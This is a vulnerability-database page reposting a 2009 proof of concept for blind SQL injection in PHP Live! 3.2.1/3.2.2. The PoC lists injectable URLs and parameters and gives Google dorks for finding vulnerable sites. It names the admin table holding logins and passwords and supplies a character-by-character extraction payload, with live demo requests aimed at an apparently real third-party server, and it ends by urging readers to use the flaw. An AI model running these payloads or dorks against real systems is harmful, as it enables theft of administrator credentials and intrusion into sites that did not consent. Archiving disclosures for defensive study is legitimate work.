PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability

Basic Fields

SSV ID:: SSV-14819

Find Time:: Unknown

Submit Time:: 2009-07-16

Level:

Category:: SQL 注入

Component:: PHP

Author:: Unknown

Submitter:: Knownsec

CVE-ID：: Add

CNNVD-ID：: Add

CNVD-ID：: Add

ZoomEye Dork：: Add

Source

Detail

Unavailable Detail

PoC (非 pocsuite 插件)

Contributor Knownsec totally have 0.15KB

PhpLive 3.2.1/2 (x) Blind SQL injection [_][-][X] _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___ | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \ | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, / |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/ Red n'black i dress eagle on my chest. It's good to be an ALBANIAN Keep my head up high for that flag i die. Im proud to be an ALBANIAN ################################################################### Author : boom3rang Contact : boom3rang[at]live.com Greetz : H!tm@N - KHG - cHs R.I.P redc00de ------------------------------------------------------------------- Affected software description Software : PhpLive Vendor : http://www.phplivesupport.com Price : Live Support Download Starts at $89.95 Version Vuln. : v3.2.1 & v3.2.2 ------------------------------------------------------------------- [~] SQLi : http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi] http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi] [~]Google Dork : Powered by PHP Live! v3.2.1 Powered by PHP Live! v3.2.2 allinurl:"request.php" "deptid" ------------------------------------------------------------------- [~] Table_NAME = chat_admin [~] Column_NAME = login - password - email - userID - name ------------------------------------------------------------------- [~] Admin Path : http://www.TARGET.com/phplive ------------------------------------------------------------------- [~] Live Demo: http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1 --> True http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2 --> False ------------------------------------------------------------------- [~] ASCII /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100 ------------------------------------------------------------------- [~] Live Demo ASCII True http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48 False http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127 ============================================================================ | USE this vulnerability, to improve your skills for Social Engineering ;) | ============================================================================ # sebug.net

have 3 Exchange

Reference Linking

Solutions

Temp Solutions

Official Solution

Defense Solutions

※Any content provided by this site, only to learn the code and services, not for illegal purposes

PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

Hello,

Hello,